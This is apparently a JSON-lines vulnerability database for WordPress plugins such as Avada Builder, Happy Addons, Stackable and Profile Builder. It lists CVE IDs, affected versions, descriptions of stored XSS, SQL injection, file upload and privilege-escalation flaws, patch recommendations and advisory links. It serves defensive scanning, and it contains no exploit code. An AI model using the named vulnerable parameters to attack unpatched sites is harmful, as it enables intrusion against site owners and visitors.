{"CVE_ID":"CVE-2024-1508","slug":"bdthemes-prime-slider-lite","versionImpact":"3.13.2","versionEndExcluding":"3.13.3","description":"The Prime Slider \u2013 Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'settings['title_tags']' attribute of the Mercury widget in all versions up to, and including, 3.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7da00af0-edd1-4c39-ae33-a0dc21bd25a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7da00af0-edd1-4c39-ae33-a0dc21bd25a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047591\\\/bdthemes-prime-slider-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047591\\\/bdthemes-prime-slider-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6296","slug":"stackable-ultimate-gutenberg-blocks","versionImpact":"3.13.1","versionEndExcluding":"3.13.2","description":"The Stackable \u2013 Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-caption\u2019 parameter in all versions up to, and including, 3.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e55742de-9eaf-48e4-8d5d-ea980dfa17cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e55742de-9eaf-48e4-8d5d-ea980dfa17cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stackable-ultimate-gutenberg-blocks\\\/trunk\\\/dist\\\/frontend_image_lightbox.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stackable-ultimate-gutenberg-blocks\\\/trunk\\\/dist\\\/frontend_image_lightbox.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108514\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108514\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12117","slug":"stackable-ultimate-gutenberg-blocks","versionImpact":"3.13.11","versionEndExcluding":"3.13.12","description":"The Stackable \u2013 Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter of the Button block in all versions up to, and including, 3.13.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223387%40stackable-ultimate-gutenberg-blocks&new=3223387%40stackable-ultimate-gutenberg-blocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223387%40stackable-ultimate-gutenberg-blocks&new=3223387%40stackable-ultimate-gutenberg-blocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedc2254-29aa-46c5-8f85-47dd6affb42b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedc2254-29aa-46c5-8f85-47dd6affb42b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4636","slug":"optimole-wp","versionImpact":"3.12.10","versionEndExcluding":"3.13.0","description":"The Image Optimization by Optimole \u2013 Lazy Load, CDN, Convert WebP & AVIF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018allow_meme_types\u2019 function in versions up to, and including, 3.12.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be88566d-fc84-442d-bb34-834ad9f4465b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be88566d-fc84-442d-bb34-834ad9f4465b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optimole-wp\\\/tags\\\/3.12.10\\\/inc\\\/admin.php#L1828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optimole-wp\\\/tags\\\/3.12.10\\\/inc\\\/admin.php#L1828\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086306\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086306\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12738","slug":"profile-builder","versionImpact":"3.12.9","versionEndExcluding":"3.13.0","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several user meta parameters in all versions up to, and including, 3.12.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and clicks a link to show user meta.","recommendation":"Update to version 3.13.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.12.8\\\/features\\\/email-confirmation\\\/class-email-confirmation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.12.8\\\/features\\\/email-confirmation\\\/class-email-confirmation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.12.8\\\/features\\\/email-confirmation\\\/class-email-confirmation.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.12.8\\\/features\\\/email-confirmation\\\/class-email-confirmation.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217544\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217544\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b626e1-89c0-49b9-bfeb-32005e8e78d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b626e1-89c0-49b9-bfeb-32005e8e78d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4931","slug":"backupwordpress","versionEndExcluding":"3.13","description":"The BackupWordPress plugin for WordPress is vulnerable to information disclosure in versions up to, and including 3.12. This is due to missing authorization on the heartbeat_received() function that triggers on WordPress heartbeat. This makes it possible for authenticated attackers, with subscriber-level permissions and above to retrieve back-up paths that can subsequently be used to download the back-up.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/747c86f4-118b-4a9c-899c-e9067d2c7a02\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/747c86f4-118b-4a9c-899c-e9067d2c7a02\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2683799%40backupwordpress&new=2683799%40backupwordpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2683799%40backupwordpress&new=2683799%40backupwordpress&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3670","slug":"leaflet-maps-marker","versionImpact":"3.12.8","versionEndExcluding":"3.12.9","description":"The Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mapsmarker' shortcode in all versions up to, and including, 3.12.8 due to insufficient input sanitization and output escaping on user supplied attributes such as 'mapwidthunit'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62ace939-3c14-4e68-897b-ec845182ca50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62ace939-3c14-4e68-897b-ec845182ca50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069915\\\/leaflet-maps-marker\\\/trunk\\\/inc\\\/showmap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069915\\\/leaflet-maps-marker\\\/trunk\\\/inc\\\/showmap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4677","slug":"leaflet-maps-marker","versionEndExcluding":"3.12.7","description":"The Leaflet Maps Marker WordPress plugin before 3.12.7 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c293098-de54-4a04-b13d-2a702200f02e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c293098-de54-4a04-b13d-2a702200f02e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10538","slug":"happy-elementor-addons","versionImpact":"3.12.5","versionEndExcluding":"3.12.6","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the before_label parameter in the Image Comparison widget in all versions up to, and including, 3.12.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.12.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd192a52-ae12-4706-b3ea-aa69f7393bb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd192a52-ae12-4706-b3ea-aa69f7393bb8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182100%40happy-elementor-addons&new=3182100%40happy-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182100%40happy-elementor-addons&new=3182100%40happy-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4794","slug":"aawp","versionEndExcluding":"3.12.3","description":"The AAWP WordPress plugin before 3.12.3 can be used to abuse trusted domains to load malware or other files through it (Reflected File Download) to bypass firewall rules in companies.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/feb4580d-df15-45c8-b59e-ad406e4b064c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/feb4580d-df15-45c8-b59e-ad406e4b064c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8801","slug":"happy-elementor-addons","versionImpact":"3.12.2","versionEndExcluding":"3.12.3","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.12.2 via the Content Switcher widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including private, draft, and pending Elementor templates.","recommendation":"Update to version 3.12.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f1078b8-f458-46a6-9982-e8d2d1d1b73b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f1078b8-f458-46a6-9982-e8d2d1d1b73b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/content-switcher\\\/widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/content-switcher\\\/widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154460\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154460\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6747","slug":"fusion-builder","versionImpact":"3.12.1","versionEndExcluding":"3.12.2","description":"The Avada (Fusion) Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fusion_map' shortcode in all versions up to, and including, 3.12.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"name\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0a21eaa-4e2a-4d07-8635-f0a8a5db660f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0a21eaa-4e2a-4d07-8635-f0a8a5db660f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0329","slug":"elementor","versionEndExcluding":"3.12.2","description":"The Elementor Website Builder WordPress plugin before 3.12.2 does not properly sanitize and escape the Replace URL parameter in the Tools module before using it in a SQL statement, leading to a SQL injection exploitable by users with the Administrator role.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a875836d-77f4-4306-b275-2b60efff1493\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a875836d-77f4-4306-b275-2b60efff1493\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6708","slug":"profile-builder","versionImpact":"3.12.1","versionEndExcluding":"3.12.2","description":"The User Profile Builder  WordPress plugin before 3.12.2 does not sanitise and escape some parameters before outputting its content on the admin area, which allows Admin+ users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 3.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6822bd9-f9f9-41a4-ad19-019b1f03bd4c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6822bd9-f9f9-41a4-ad19-019b1f03bd4c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10682","slug":"bulletin-announcements","versionImpact":"3.11.7","versionEndExcluding":"3.12","description":"The Announcement & Notification Banner \u2013 Bulletin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg and remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.11.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/tags\\\/3.11.5\\\/classes\\\/class-bulletinwp-bulletins-table.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08033270-5547-437b-95e6-e004b78df5e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08033270-5547-437b-95e6-e004b78df5e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5395","slug":"wp-automatic","versionImpact":"3.115.0","versionEndExcluding":"3.116.0","description":"The WordPress Automatic Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'core.php' file in all versions up to, and including, 3.115.0. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.116.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-automatic-plugin\\\/1904470#item-description__changelog\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-automatic-plugin\\\/1904470#item-description__changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57be67fd-8485-495f-b5e9-6eb52af945b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57be67fd-8485-495f-b5e9-6eb52af945b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1065","slug":"visualizer","versionImpact":"3.11.8","versionEndExcluding":"3.11.9","description":"The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Import Data From File feature in all versions up to, and including, 3.11.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240066\\\/visualizer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240066\\\/visualizer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c1de7b-5178-4fbe-a515-169de4323ae7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c1de7b-5178-4fbe-a515-169de4323ae7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6366","slug":"profile-builder","versionImpact":"3.11.7","versionEndExcluding":"3.11.8","description":"The User Profile Builder  WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.","recommendation":"Update to version 3.11.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3124","slug":"elementor-pro","versionEndExcluding":"3.11.7","description":"The Elementor Pro plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_page_option function in versions up to, and including, 3.11.6. This makes it possible for authenticated attackers with subscriber-level capabilities to update arbitrary site options, which can lead to privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/high-severity-vulnerability-fixed-in-wordpress-elementor-pro-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/high-severity-vulnerability-fixed-in-wordpress-elementor-pro-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/570474f2-c118-45e1-a237-c70b849b2d3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/570474f2-c118-45e1-a237-c70b849b2d3c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4668","slug":"easy-appointments","versionEndExcluding":"3.11.2","description":"The Easy Appointments WordPress plugin before 3.11.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e43156a-b784-4066-be69-23b139aafbad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e43156a-b784-4066-be69-23b139aafbad\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1665","slug":"fusion-builder","versionImpact":"3.11.14","versionEndExcluding":"3.11.15","description":"The Avada (Fusion) Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes in all versions up to, and including, 3.11.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\",\"name\":\"https:\\\/\\\/avada.com\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94e373fb-b3f5-4c1b-9eaa-89747af4dc30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94e373fb-b3f5-4c1b-9eaa-89747af4dc30?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13345","slug":"fusion-builder","versionImpact":"3.11.13","versionEndExcluding":"3.11.14","description":"The Avada Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.11.13. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.11.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"name\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94f6aab3-49a7-4837-a424-e40e483f3f68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94f6aab3-49a7-4837-a424-e40e483f3f68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12335","slug":"fusion-builder","versionImpact":"3.11.12","versionEndExcluding":"3.11.13","description":"The Avada (Fusion) Builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.11.12 via the handle_clone_post() function and the 'fusion_blog' shortcode and due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 3.11.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\",\"name\":\"https:\\\/\\\/avada.com\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4181dcad-b5bd-46db-b47c-3cdee427123c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4181dcad-b5bd-46db-b47c-3cdee427123c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12477","slug":"fusion-builder","versionImpact":"3.11.11","versionEndExcluding":"3.11.12","description":"The Avada Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.11.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/avada.com\",\"name\":\"https:\\\/\\\/avada.com\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c54588f-6436-406f-93cb-b08965586d11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c54588f-6436-406f-93cb-b08965586d11?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5628","slug":"fusion-builder","versionImpact":"3.11.9","versionEndExcluding":"3.11.10","description":"The Avada | Website Builder For WordPress & eCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's fusion_button shortcode in all versions up to, and including, 3.11.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in 3.11.9. Additional hardening for alternate attack vectors was added to version 3.11.10.","recommendation":"Update to version 3.11.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c23bd29-ba02-4c90-a631-5ce6294d7760?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c23bd29-ba02-4c90-a631-5ce6294d7760?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"name\":\"https:\\\/\\\/avada.com\\\/documentation\\\/avada-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/avada.com\\\/blog\\\/version-7-11-9-security-update\\\/\",\"name\":\"https:\\\/\\\/avada.com\\\/blog\\\/version-7-11-9-security-update\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5041","slug":"happy-elementor-addons","versionImpact":"3.10.9","versionEndExcluding":"3.11.0","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ha-ia-content-button\u2019 parameter in all versions up to, and including, 3.10.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.11.0, or a newer patched 